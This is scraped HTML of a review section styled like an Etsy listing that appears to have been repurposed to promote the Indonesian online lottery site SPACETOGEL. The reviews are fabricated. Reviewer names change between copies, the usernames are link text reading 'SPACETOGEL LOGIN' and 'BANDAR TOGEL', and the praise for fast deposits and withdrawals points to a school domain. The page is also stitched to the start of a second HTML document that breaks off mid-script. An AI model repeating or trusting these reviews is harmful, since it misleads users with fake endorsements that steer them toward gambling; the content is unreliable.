            <button data-clg-id="WtMenuItem" type="button" role="menuitemradio" class="wt-menu__item reviews-sort-by-item" tabindex="-1" data-sort-option="Lowest" aria-checked="false">
     Lowest Rating 
</button>


</div>
</div>
</div>
                    </div>
                </div>

        </div>

        

        <div class="wt-grid wt-grid--block wt-mb-xs-2 wt-mb-lg-6">
            <div class="wt-grid__item-xs-12 review-card" data-review-region="4677086143">
    <div class="wt-bb-xs wt-pt-xs-2 wt-pt-md-1 wt-pb-xs-2">
        <div class="min-width-0" id="review-text-width-0">
            <div class="wt-max-width-full">
                <div class="wt-display-flex-xs wt-flex-direction-row-xs wt-justify-content-space-between wt-flex-wrap wt-mb-xs-2 wt-mb-md-0">
                    <div class="wt-mb-xs-1">
                        <span class="wt-display-inline-block wt-mr-xs-1" data-stars-svg-container>
    <input type="hidden" name="initial-rating" value="5" />
    <input type="hidden" name="rating" value="5" />
    <span class="wt-screen-reader-only">5 out of 5 stars</span>

    <span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="3"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="4"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
    </span>
        <span class="wt-text-title wt-nudge-l-3 wt-nudge-t-1">
            5
        </span>
</span>
                        <span data-clg-id="WtBadge" class="wt-badge wt-badge--default wt-badge--small wt-badge--border">
        This item

</span>
                            <span class="wt-bl-xs wt-mr-xs-1 wt-ml-xs-1 wt-nudge-t-1 wt-nudge-r-1"></span>
                            <span class="wt-text-body-smaller">
        <span class="wt-icon wt-fill-slime wt-icon--smallest-xs wt-nudge-b-1 wt-nudge-r-2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M9.059 20.473 21.26 6.15l-1.52-1.298-10.8 12.675-4.734-4.734-1.414 1.414z"/></svg></span>Recommends
</span>
                    </div>
                    <div class="wt-hide-xs wt-show-md wt-mb-xs-1">
                        <div class="wt-display-flex-xs wt-align-items-center">
        <span class="wt-icon wt-icon--smaller-xs wt-mr-xs-1 wt-flex-shrink-xs-0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false">
  <path d="M12 24c6.627 0 12-5.373 12-12S18.627 0 12 0 0 5.373 0 12s5.373 12 12 12z" fill="#CCEBFF"/>
  <path d="M18.646 16.01c-.268-4.538-1.24-10.998-3.187-11.411-1.935-.414-7.932 2.19-11.156 6.277-1.095 1.387-.779 3.333.706 4.294 2.822 1.837 6.812 3.249 10.097 3.918 1.898.389 3.65-1.132 3.54-3.078z" fill="#4BC46D"/>
</svg></span>
    <p class="wt-text-body-small">
            <a href="https://ppschool.org.in/stella/"
            rel="nofollow"
            aria-label="Reviewer Melissa Kernan"
            class="wt-text-link-no-underline wt-text-title-small"
            data-review-username
            data-transaction-id="4677086143"
            >
        SPACETOGEL LOGIN</a>
        <span class="wt-bl-xs wt-mr-xs-1 wt-ml-xs-1 wt-nudge-t-1 wt-nudge-r-1"></span>
        Sep 14, 2025
    </p>
</div>
                    </div>
                </div>

                <div class="wt-display-flex-xs wt-flex-direction-row-xs wt-justify-content-space-between wt-align-items-flex-start">
                    <div class="wt-text-body">
                        <div class="max-height-review max-height-text-container is-long">
    <div data-review-text-toggle-wrapper>
<div data-clg-id="WtInlineToggle" class="wt-content-toggle--truncated-inline-multi wt-break-word wt-text-body">
    <div class="wt-content-toggle__trigger-wrapper">
        <button
                type="button"
                class="wt-content-toggle--ellipsis-btn"
                data-one-way="false"
                data-wt-content-toggle
                data-inline="multi"
                aria-controls="review-preview-toggle-01757443933"
        >
            <span class="etsy-icon wt-icon--base-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><circle cx="12" cy="12.001" r="2.999"/><circle cx="3" cy="12.001" r="2.999"/><circle cx="21" cy="12.001" r="2.999"/></svg></span>
            <span class="wt-screen-reader-only">Listing review by SPACETOGEL LOGIN</span>
        </button>
    </div>

    <p id="review-preview-toggle-01757443933" class="wt-text-truncate--multi-line wt-break-word wt-text-body" >
      bermain togel di SPACETOGEL sangat mudah dan juga sistem deposit dan wd yang cepat, aman sekali untuk player baru seperti saya top deh pokonya SPACETOGEL

    </p>
</div>
    </div>
</div>
                    </div>
                </div>
                <div class="wt-show-xs wt-hide-md wt-mt-xs-3 wt-mb-xs-1">
                    <div class="wt-display-flex-xs wt-align-items-center">
        <span class="wt-icon wt-icon--smaller-xs wt-mr-xs-1 wt-flex-shrink-xs-0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false">
  <path d="M12 24c6.627 0 12-5.373 12-12S18.627 0 12 0 0 5.373 0 12s5.373 12 12 12z" fill="#CCEBFF"/>
  <path d="M18.646 16.01c-.268-4.538-1.24-10.998-3.187-11.411-1.935-.414-7.932 2.19-11.156 6.277-1.095 1.387-.779 3.333.706 4.294 2.822 1.837 6.812 3.249 10.097 3.918 1.898.389 3.65-1.132 3.54-3.078z" fill="#4BC46D"/>
</svg></span>
    <p class="wt-text-body-small">
            <a href="https://ppschool.org.in/stella/"
            rel="nofollow"
            aria-label="Reviewer Joana Kernan"
            class="wt-text-link-no-underline wt-text-title-small"
            data-review-username
            data-transaction-id="4677086143"
            >SPACETOGEL LOGIN</a>
        <span class="wt-bl-xs wt-mr-xs-1 wt-ml-xs-1 wt-nudge-t-1 wt-nudge-r-1"></span>
        Sep 14, 2025
    </p>
</div>
                </div>

            </div>

            


        </div>
    </div>
</div><div class="wt-grid__item-xs-12 review-card" data-review-region="4706945066">
    <div class="wt-bb-xs wt-pt-xs-2 wt-pt-md-1 wt-pb-xs-2">
        <div class="min-width-0" id="review-text-width-1">
            <div class="wt-max-width-full">
                <div class="wt-display-flex-xs wt-flex-direction-row-xs wt-justify-content-space-between wt-flex-wrap wt-mb-xs-2 wt-mb-md-0">
                    <div class="wt-mb-xs-1">
                        <span class="wt-display-inline-block wt-mr-xs-1" data-stars-svg-container>
    <input type="hidden" name="initial-rating" value="5" />
    <input type="hidden" name="rating" value="5" />
    <span class="wt-screen-reader-only">5 out of 5 stars</span>

    <span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="3"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="4"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
    </span>
        <span class="wt-text-title wt-nudge-l-3 wt-nudge-t-1">
            5
        </span>
</span>
                        <span data-clg-id="WtBadge" class="wt-badge wt-badge--default wt-badge--small wt-badge--border">
        This item

</span>
                            <span class="wt-bl-xs wt-mr-xs-1 wt-ml-xs-1 wt-nudge-t-1 wt-nudge-r-1"></span>
                            <span class="wt-text-body-smaller">
        <span class="wt-icon wt-fill-slime wt-icon--smallest-xs wt-nudge-b-1 wt-nudge-r-2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M9.059 20.473 21.26 6.15l-1.52-1.298-10.8 12.675-4.734-4.734-1.414 1.414z"/></svg></span>Recommends
</span>
                    </div>
                    <div class="wt-hide-xs wt-show-md wt-mb-xs-1">
                        <div class="wt-display-flex-xs wt-align-items-center">
        <span class="wt-icon wt-icon--smaller-xs wt-mr-xs-1 wt-flex-shrink-xs-0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false">
  <path d="M12 24c6.627 0 12-5.373 12-12S18.627 0 12 0 0 5.373 0 12s5.373 12 12 12z" fill="#FFE0C3"/>
  <path d="M18.863 8.412c-3.8-1.6-7.713-2.9-11.713-3.912a133.96 133.96 0 00-2.4 9.887l7.025 5.113s6.1-3.063 7.237-3.813c.788-.524-.15-7.274-.15-7.274z" fill="#095E31"/>
</svg></span>
    <p class="wt-text-body-small">
            <a href="https://ppschool.org.in/stella/"
            rel="nofollow"
            aria-label="Reviewer Leslie Jimenez"
            class="wt-text-link-no-underline wt-text-title-small"
            data-review-username
            data-transaction-id="4706945066"
            >
        BANDAR TOGEL</a>
        <span class="wt-bl-xs wt-mr-xs-1 wt-ml-xs-1 wt-nudge-t-1 wt-nudge-r-1"></span>
        Sep 19, 2025
    </p>
</div>
                    </div>
                </div>

                <div class="wt-display-flex-xs wt-flex-direction-row-xs wt-justify-content-space-between wt-align-items-flex-start">
                    <div class="wt-text-body">
                        <div class="max-height-review max-height-text-container is-long">
    <div data-review-text-toggle-wrapper>
<div data-clg-id="WtInlineToggle" class="wt-content-toggle--truncated-inline-multi wt-break-word wt-text-body">
    <div class="wt-content-toggle__trigger-wrapper">
        <button
                type="button"
                class="wt-content-toggle--ellipsis-btn"
                data-one-way="false"
                data-wt-content-toggle
                data-inline="multi"
                aria-controls="review-preview-toggle-11757443933"
        >
            <span class="etsy-icon wt-icon--base-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><circle cx="12" cy="12.001" r="2.999"/><circle cx="3" cy="12.001" r="2.999"/><circle cx="21" cy="12.001" r="2.999"/></svg></span>
            <span class="wt-screen-reader-only">Listing review by Lesley Jimenaz</span>
        </button>
    </div>

    <p id="review-preview-toggle-11757443933" class="wt-text-truncate--multi-line wt-break-word wt-text-body" >
        bandar togel terbaik si emang SPACETOGEL ini trusted deh main togel disini

    </p>
</div>
    </div>
</div>
              
                </div>

            </div>

            


        </div>
    </div>
</div>
        </div>
    </div>

        <div class="wt-display-flex-xs wt-justify-content-space-between wt-flex-wrap wt-flex-gap-xs-3 wt-mb-xs-5 wt-mb-lg-6">
                <nav data-clg-id="WtPagination" aria-label="Pagination">
    <div class="wt-action-group wt-list-inline wt-flex-no-wrap  " data-reviews-pagination="">
            <div class="wt-action-group__item-container">
                <a class="wt-action-group__item wt-btn wt-btn--small wt-btn--icon  wt-is-disabled"
                    
                    aria-disabled="true" role="link"
                    
                    
                >
                    <span class="wt-screen-reader-only">Previous page</span>
                    <span class="wt-icon wt-icon--smaller"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false">
  <path d="M6.7 11.3L6 12l.7.7 4 4c.4.4 1 .4 1.4 0 .4-.4.4-1 0-1.4L9.8 13H17c.6 0 1-.4 1-1s-.4-1-1-1H9.8l2.3-2.3c.2-.2.3-.4.3-.7 0-.6-.4-1-1-1-.3 0-.5.1-.7.3l-4 4z"/>
</svg></span>
                </a>
            </div>

            <div class="wt-action-group__item-container">
                    <a href="https://ppschool.org.in/stella/?ref=pagination&page=1" class="wt-action-group__item wt-btn wt-btn--small wt-pr-xs-2 wt-pl-xs-2 wt-is-selected"
                        aria-current="true"
                        
                        
                    >
                        <span>1</span>
                    </a>
            </div>
            <div class="wt-action-group__item-container">
                    <a href="https://ppschool.org.in/stella/?ref=pagination&page=2" class="wt-action-group__item wt-btn wt-btn--small wt-pr-xs-2 wt-pl-xs-2"
                        
                        data-page="2"
                        
                    >
                        <span>2</span>
                    </a>
            </div>
            <div class="wt-action-group__item-container">
                    <a href="https://ppschool.org.in/stella/?ref=pagination&page=3" class="wt-action-group__item wt-btn wt-btn--small wt-pr-xs-2 wt-pl-xs-2"
                        
                        data-page="3"
                        
                    >
                        <span>3</span>
                    </a>
            </div>
            <div class="wt-action-group__item-container">
                    <a href="https://ppschool.org.in/stella/?ref=pagination&page=4" class="wt-action-group__item wt-btn wt-btn--small wt-pr-xs-2 wt-pl-xs-2"
                        
                        data-page="4"
                        
                    >
                        <span>4</span>
                    </a>
            </div>
            <div class="wt-action-group__item-container">
                    <a href="https://ppschool.org.in/stella/?ref=pagination&page=5" class="wt-action-group__item wt-btn wt-btn--small wt-pr-xs-2 wt-pl-xs-2"
                        
                        data-page="5"
                        
                    >
                        <span>5</span>
                    </a>
            </div>


            <div class="wt-action-group__item-container">
                <a class="wt-action-group__item wt-btn wt-btn--small wt-btn--icon "
                    href="https://ppschool.org.in/stella/?ref=pagination&page=2"
                    
                    data-page="2"
                    
                >
                    <span class="wt-screen-reader-only">Next page</span>
                    <span class="wt-icon wt-icon--smaller"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false">
  <path d="M17.3 12.7l.7-.7-.7-.7-4-4c-.4-.4-1-.4-1.4 0s-.4 1 0 1.4l2.3 2.3H7c-.6 0-1 .4-1 1s.4 1 1 1h7.2l-2.3 2.3c-.2.2-.3.4-.3.7 0 .6.4 1 1 1 .3 0 .5-.1.7-.3l4-4z"/>
</svg></span>
                </a>
            </div>
    </div>
</nav>

<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-btn--small" id="shop-reviews-tab" data-wt-tab="shop">
                        Show other item reviews from SPACETOGEL

</button>
        </div>
        <div data-appears-component-name="customer_photos" data-appears-event-data='{"photos_count":20}'>
<div class="wt-grid__item-lg-12 customer-photos-carousel wt-mb-xs-6 wt-mb-lg-9 wt-pb-xs-1"
     data-customer-photos-section="shop"
     data-customer-photos-carousel
>
        <h3 class="wt-mb-xs-2 wt-text-body-01">
            Photos from reviews
        </h3>
    <div class="wt-position-relative wt-overflow-x-hidden wt-overflow-y-hidden">
        <button class="prev wt-btn wt-btn--filled wt-btn--light wt-btn--icon wt-position-left wt-position-absolute wt-display-block wt-z-index-2 wt-shadow-elevation-3 wt-ml-xs-2 wt-vertical-center" aria-label="previous">
            <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M16,21a0.994,0.994,0,0,1-.664-0.253L5.5,12l9.841-8.747a1,1,0,0,1,1.328,1.494L8.5,12l8.159,7.253A1,1,0,0,1,16,21Z"/></svg></span>
        </button>
        <button class="next wt-btn wt-btn--filled wt-btn--light wt-btn--icon wt-position-right wt-position-absolute wt-display-block wt-z-index-2 wt-shadow-elevation-3 wt-mr-xs-2 wt-vertical-center" aria-label="next">
            <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M8,21a1,1,0,0,1-.664-1.747L15.5,12,7.336,4.747A1,1,0,0,1,8.664,3.253L18.5,12,8.664,20.747A0.994,0.994,0,0,1,8,21Z"/></svg></span>
        </button>

        <div class="carousel-inner wt-grid wt-flex-nowrap wt-grid--block wt-pt-xs-1 wt-pb-xs-1">
            <div
    class="wt-flex-shrink-xs-0 wt-grid__item-xs-3 wt-grid__item-md-3"
    id="customer-photos-carousel-inner"
    
>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-p-xs-0 wt-rounded wt-overflow-hidden wt-width-full appreciation-focus" aria-controls="customer-photo-overlay-carousel" aria-label="View details of this review photo by Lolly" data-js-action="openReviewPhotoOverlay" data-transaction-id="4686671368" data-index="0" data-location="customer-photo-section" data-page="view_listing">
                <div class="wt-image-placeholder--1-1 wt-position-relative">
                <img
    data-clg-id="WtImage"
    class="wt-width-full wt-display-block wt-height-full wt-position-absolute wt-position-top wt-position-left wt-image--cover wt-image"
    src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0"
    alt="Lolly added a photo of their purchase"
    style="aspect-ratio: 1;"
    loading="lazy"
    sizes="(max-width: 479px) 100px, (max-width: 639px) 150px, (max-width: 899px) 200px, (max-width: 1199px) 150px, 200px"
    srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 100w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 200w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 300w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 600w"
/>

            </div>

</button>
</div><div
    class="wt-flex-shrink-xs-0 wt-grid__item-xs-3 wt-grid__item-md-3"
    id="customer-photos-carousel-inner"
    
>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-p-xs-0 wt-rounded wt-overflow-hidden wt-width-full appreciation-focus" aria-controls="customer-photo-overlay-carousel" aria-label="View details of this review photo by chacejmcleish" data-js-action="openReviewPhotoOverlay" data-transaction-id="4699975020" data-index="1" data-location="customer-photo-section" data-page="view_listing">
                <div class="wt-image-placeholder--1-1 wt-position-relative">
                <img
    data-clg-id="WtImage"
    class="wt-width-full wt-display-block wt-height-full wt-position-absolute wt-position-top wt-position-left wt-image--cover wt-image"
    src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0"
    alt="chacejmcleish added a photo of their purchase"
    style="aspect-ratio: 1;"
    loading="lazy"
    sizes="(max-width: 479px) 100px, (max-width: 639px) 150px, (max-width: 899px) 200px, (max-width: 1199px) 150px, 200px"
    srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 100w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 200w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 300w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 600w"
/>

            </div>

</button>
</div><div
    class="wt-flex-shrink-xs-0 wt-grid__item-xs-3 wt-grid__item-md-3"
    id="customer-photos-carousel-inner"
    
>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-p-xs-0 wt-rounded wt-overflow-hidden wt-width-full appreciation-focus" aria-controls="customer-photo-overlay-carousel" aria-label="View details of this review photo by chacejmcleish" data-js-action="openReviewPhotoOverlay" data-transaction-id="4699975020" data-index="1" data-location="customer-photo-section" data-page="view_listing">
                <div class="wt-image-placeholder--1-1 wt-position-relative">
                <img
    data-clg-id="WtImage"
    class="wt-width-full wt-display-block wt-height-full wt-position-absolute wt-position-top wt-position-left wt-image--cover wt-image"
    src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0"
    alt="chacejmcleish added a photo of their purchase"
    style="aspect-ratio: 1;"
    loading="lazy"
    sizes="(max-width: 479px) 100px, (max-width: 639px) 150px, (max-width: 899px) 200px, (max-width: 1199px) 150px, 200px"
    srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 100w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 200w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 300w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 600w"
/>

            </div>

</button>
</div><div
    class="wt-flex-shrink-xs-0 wt-grid__item-xs-3 wt-grid__item-md-3"
    id="customer-photos-carousel-inner"
    
>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-p-xs-0 wt-rounded wt-overflow-hidden wt-width-full appreciation-focus" aria-controls="customer-photo-overlay-carousel" aria-label="View details of this review photo by Silje" data-js-action="openReviewPhotoOverlay" data-transaction-id="4624321020" data-index="2" data-location="customer-photo-section" data-page="view_listing">
                <div class="wt-image-placeholder--1-1 wt-position-relative">
                <img
    data-clg-id="WtImage"
    class="wt-width-full wt-display-block wt-height-full wt-position-absolute wt-position-top wt-position-left wt-image--cover wt-image"
    src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0"
    alt="Silje added a photo of their purchase"
    style="aspect-ratio: 1;"
    loading="lazy"
    sizes="(max-width: 479px) 100px, (max-width: 639px) 150px, (max-width: 899px) 200px, (max-width: 1199px) 150px, 200px"
    srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 100w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 200w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 300w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 600w"
/>

            </div>
       </button>
     </div>
     
  <script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"version":"2024.11.0","token":"00e8e59558ca43b8a5da4e4b234eb4cd","r":1,"server_timing":{"name":{"cfCacheStatus":true,"cfEdge":true,"cfExtPri":true,"cfL4":true,"cfOrigin":true,"cfSpeedBrain":true},"location_startswith":null}}' crossorigin="anonymous"></script>
<!-- Code injected by live-server -->
<script>
	// <![CDATA[  <-- For SVG support
	if ('WebSocket' in window) {
		(function () {
			function refreshCSS() {
				var sheets = [].slice.call(document.getElementsByTagName("link"));
				var head = document.getElementsByTagName("head")[0];
				for (var i = 0; i < sheets.length; ++i) {
					var elem = sheets[i];
					var parent = elem.parentElement || head;
					parent.removeChild(elem);
					var rel = elem.rel;
					if (elem.href && typeof rel != "string" || rel.length == 0 || rel.toLowerCase() == "stylesheet") {
						var url = elem.href.replace(/(&|\?)_cacheOverride=\d+/, '');
						elem.href = url + (url.indexOf('?') >= 0 ? '&' : '?') + '_cacheOverride=' + (new Date().valueOf());
					}
					parent.appendChild(elem);
				}
			}
			var protocol = window.location.protocol === 'http:' ? 'ws://' : 'wss://';
			var address = protocol + window.location.host + window.location.pathname + '/ws';
			var socket = new WebSocket(address);
			socket.onmessage = function (msg) {
				if (msg.data == 'reload') window.location.reload();
				else if (msg.data == 'refreshcss') refreshCSS();
			};
			if (sessionStorage && !sessionStorage.getItem('IsThisFirstTime_Log_From_LiveServer')) {
				console.log('Live reload enabled.');
				sessionStorage.setItem('IsThisFirstTime_Log_From_LiveServer', true);
			}
		})();
	}
	else {
		console.error('Upgrade your browser. This Browser is NOT supported WebSocket for Live-Reloading.');
	}
	// ]]>
</script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"version":"2024.11.0","token":"680bb73a827c4655a4c97a1d0551e07d","r":1,"server_timing":{"name":{"cfCacheStatus":true,"cfEdge":true,"cfExtPri":true,"cfL4":true,"cfOrigin":true,"cfSpeedBrain":true},"location_startswith":null}}' crossorigin="anonymous"></script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"version":"2024.11.0","token":"680bb73a827c4655a4c97a1d0551e07d","r":1,"server_timing":{"name":{"cfCacheStatus":true,"cfEdge":true,"cfExtPri":true,"cfL4":true,"cfOrigin":true,"cfSpeedBrain":true},"location_startswith":null}}' crossorigin="anonymous"></script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"version":"2024.11.0","token":"680bb73a827c4655a4c97a1d0551e07d","r":1,"server_timing":{"name":{"cfCacheStatus":true,"cfEdge":true,"cfExtPri":true,"cfL4":true,"cfOrigin":true,"cfSpeedBrain":true},"location_startswith":null}}' crossorigin="anonymous"></script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"version":"2024.11.0","token":"c29339c7252646d296388c709f71fca0","r":1,"server_timing":{"name":{"cfCacheStatus":true,"cfEdge":true,"cfExtPri":true,"cfL4":true,"cfOrigin":true,"cfSpeedBrain":true},"location_startswith":null}}' crossorigin="anonymous"></script>
</body>
</html>


<!DOCTYPE html>
<html lang="en-US"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="https://www.facebook.com/2008/fbml">
    <head>
        <script>if (window.performance && performance.mark) performance.mark("TTP")</script>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
            <meta http-equiv="content-language" content="en-ID">

        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="pinterest" content="nosearch">

        <meta name="csrf_nonce" content="3:1757443933:h3mNc4ckq3t2W3lUIwJ4ng47mPQt:8a416649e0e75d267ae855f66eed361ff1967f7d806ceb0850e1da0ce950a3ba">
        <meta name="uaid_nonce" content="3:1757443933:y6IRaUq1O7KIFfqDjKuVNvcfAysZ:e9f728fdc47b6a20961f8aef4d6743cf20348efc7ecb9616fd788cfe816da6a4">

        <meta property="fb:app_id" content="89186614300">

        <meta name="css_dist_path" content="/ac/sasquatch/css/" />
        <meta name="dist" content="202509091757442671" />


        <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">
